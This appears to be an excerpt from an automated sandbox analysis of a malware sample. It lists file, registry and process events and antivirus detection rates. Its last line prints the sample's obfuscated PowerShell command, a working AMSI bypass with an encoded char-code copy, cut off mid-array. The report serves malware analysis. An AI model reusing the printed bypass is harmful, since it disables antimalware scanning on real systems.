          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: s2rsXUiUn8.exeMetadefender: Detection: 17%
          Source: s2rsXUiUn8.exeReversingLabs: Detection: 57%
          Source: unknownProcess created: C:\Users\user\Desktop\s2rsXUiUn8.exe 'C:\Users\user\Desktop\s2rsXUiUn8.exe'
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s2rsXUiUn8.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,4<